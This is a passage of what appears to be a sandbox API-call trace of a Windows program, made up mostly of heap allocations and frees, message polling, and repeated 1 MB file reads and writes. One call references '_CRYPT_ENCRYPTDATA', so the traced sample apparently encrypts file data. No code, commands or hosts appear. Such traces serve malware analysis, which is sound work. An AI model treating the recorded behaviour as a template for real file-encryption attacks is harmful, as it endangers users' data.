dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0191.546] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0xe53020 | out: hHeap=0x970000) returned 1 [0191.551] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0191.551] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b88 [0191.551] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x100000) returned 0xe5a020 [0191.561] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x14b2020 | out: hHeap=0x970000) returned 1 [0191.601] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0191.601] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0191.601] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0191.601] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0191.601] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a48 [0191.601] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0191.601] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a48 | out: hHeap=0x970000) returned 1 [0191.601] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0191.601] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50608 [0191.601] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50518 [0191.601] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0191.601] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0191.601] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0191.601] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0191.601] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0191.671] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x100000) returned 0xf68020 [0191.684] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0191.684] WriteFile (in: hFile=0x2a0, lpBuffer=0xf68020*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0xf68020*, lpNumberOfBytesWritten=0x8cf5e4*=0x100000, lpOverlapped=0x0) returned 1 [0191.773] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50518 | out: hHeap=0x970000) returned 1 [0191.773] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0xf68020 | out: hHeap=0x970000) returned 1 [0191.776] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0191.776] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0191.776] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0191.776] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0191.776] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a08 | out: hHeap=0x970000) returned 1 [0191.776] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0191.776] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0191.777] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0191.777] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0191.777] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0191.777] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50518 [0191.777] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0191.777] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0191.777] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0191.777] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50530 [0191.777] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0191.777] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0191.777] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ac8 [0191.777] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0191.777] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0191.777] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0191.777] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0191.777] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50578 [0191.777] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0191.777] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x100000) returned 0xf64020 [0191.779] ReadFile (in: hFile=0x2d0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8cf4f8*=0x10000, lpOverlapped=0x0) returned 1 [0191.794] ReadFile (in: hFile=0x2d0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8cf4f8*=0x10000, lpOverlapped=0x0) returned 1 [0191.796] ReadFile (in: hFile=0x2d0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8cf4f8*=0x10000, lpOverlapped=0x0) returned 1 [0191.868] ReadFile (in: hFile=0x2d0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8cf4f8*=0x10000, lpOverlapped=0x0) returned 1 [0191.871] ReadFile (in: hFile=0x2d0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8cf4f8*=0x10000, lpOverlapped=0x0) returned 1 [0191.873] ReadFile (in: hFile=0x2d0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8cf4f8*=0x10000, lpOverlapped=0x0) returned 1 [0191.932] ReadFile (in: hFile=0x2d0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8cf4f8*=0x10000, lpOverlapped=0x0) returned 1 [0191.934] ReadFile (in: hFile=0x2d0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8cf4f8*=0x10000, lpOverlapped=0x0) returned 1 [0191.935] ReadFile (in: hFile=0x2d0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8cf4f8*=0x10000, lpOverlapped=0x0) returned 1 [0191.938] ReadFile (in: hFile=0x2d0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8cf4f8*=0x10000, lpOverlapped=0x0) returned 1 [0191.939] ReadFile (in: hFile=0x2d0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8cf4f8*=0x10000, lpOverlapped=0x0) returned 1 [0191.941] ReadFile (in: hFile=0x2d0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8cf4f8*=0x10000, lpOverlapped=0x0) returned 1 [0191.943] ReadFile (in: hFile=0x2d0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8cf4f8*=0x10000, lpOverlapped=0x0) returned 1 [0191.946] ReadFile (in: hFile=0x2d0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8cf4f8*=0x10000, lpOverlapped=0x0) returned 1 [0191.949] ReadFile (in: hFile=0x2d0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8cf4f8*=0x10000, lpOverlapped=0x0) returned 1 [0191.952] ReadFile (in: hFile=0x2d0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8cf4f8*=0x10000, lpOverlapped=0x0) returned 1 [0191.954] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50578 | out: hHeap=0x970000) returned 1 [0191.954] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0191.954] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0191.954] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0191.954] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x100000) returned 0x107b020 [0192.037] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0xf64020 | out: hHeap=0x970000) returned 1 [0192.040] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0192.040] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50530 | out: hHeap=0x970000) returned 1 [0192.040] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50518 | out: hHeap=0x970000) returned 1 [0192.040] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0192.040] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0xe5a020 | out: hHeap=0x970000) returned 1 [0192.041] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0192.041] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ce8 [0192.041] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x100000) returned 0xe52020 [0192.113] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x107b020 | out: hHeap=0x970000) returned 1 [0192.118] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0192.118] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 1 [0192.118] TranslateMessage (lpMsg=0x8cf708) returned 0 [0192.119] DispatchMessageW (lpMsg=0x8cf708) returned 0x0 [0192.119] KillTimer (hWnd=0x402c2, uIDEvent=0x1) returned 1 [0192.119] SetTimer (hWnd=0x402c2, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0192.119] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0192.119] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0192.119] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505c0 [0192.119] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50530 [0192.119] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0192.119] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0192.119] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x100000) returned 0xf63020 [0192.223] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0192.223] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0xf63020 | out: hHeap=0x970000) returned 1 [0192.230] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0192.230] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50530 | out: hHeap=0x970000) returned 1 [0192.230] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505c0 | out: hHeap=0x970000) returned 1 [0192.230] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0192.230] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0192.230] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0192.230] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0192.230] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69be8 [0192.230] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69be8 | out: hHeap=0x970000) returned 1 [0192.230] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0192.230] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0192.231] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a08 [0192.231] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0192.231] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0192.231] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fca8 [0192.231] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0192.231] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0192.231] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fca8 | out: hHeap=0x970000) returned 1 [0192.231] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0192.231] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50608 [0192.231] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54dd8 [0192.231] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0192.231] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505c0 [0192.231] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0192.231] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0192.231] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x100000) returned 0xf66020 [0192.313] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0192.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54d88 [0192.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0192.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0192.313] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0192.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54ed8 [0192.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50518 [0192.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0192.313] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0192.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54d98 [0192.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50530 [0192.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0192.313] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0192.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50578 [0192.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540a8 [0192.314] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0192.314] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0192.314] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0192.314] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0192.314] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x100000) returned 0x107c020 [0192.331] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54530 [0192.331] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0192.331] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0192.331] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0192.331] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540f8 [0192.331] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0192.331] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54558 [0192.331] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507d0 [0192.331] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0192.331] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0192.331] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54080 [0192.331] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0192.332] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0192.332] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0192.332] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0192.332] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0192.332] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0192.332] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0192.332] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0192.332] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0192.332] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0192.332] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540d0 [0192.332] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0192.332] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0192.332] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0192.332] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0192.332] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0192.332] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0192.332] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0192.332] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0192.332] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0192.332] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0192.332] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0192.332] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0192.332] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0192.332] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543c8 [0192.332] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0192.332] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0192.332] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0192.333] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0192.333] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0192.333] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0192.333] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0192.333] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0192.333] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0192.333] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0192.333] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0192.333] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0192.333] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0192.333] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54350 [0192.333] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0192.333] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0192.333] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0192.333] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0192.333] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0192.333] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0192.333] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0192.333] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0192.333] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0192.333] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0192.333] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0192.333] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543f0 [0192.333] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0192.333] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50890 [0192.333] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0192.333] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54198 [0192.334] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0192.334] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0192.334] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0192.334] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54120 [0192.334] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0192.334] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0192.334] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543f0 | out: hHeap=0x970000) returned 1 [0192.334] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0192.334] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0192.334] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0192.334] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0192.334] 